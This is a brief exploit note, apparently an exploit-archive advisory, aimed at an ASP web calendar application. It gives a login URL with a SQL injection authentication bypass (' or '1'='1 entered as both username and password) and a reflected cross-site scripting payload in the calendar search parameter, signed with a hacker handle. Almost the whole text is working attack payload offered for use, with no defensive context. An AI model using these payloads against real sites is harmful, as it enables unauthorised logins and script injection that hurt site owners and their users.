http://www.example.com/[script]/db/agenda/calendar.asp?DoAction=USER&Change=LOGINFORM

username:' or '1'='1

password:' or '1'='1

http://www.example.com/[script]/CALENDAR.ASP?DoAction=Calendar&View=Search&SText=<script>alert('Bl@ckbe@rD is not dead yet')</script>[Peace xD ]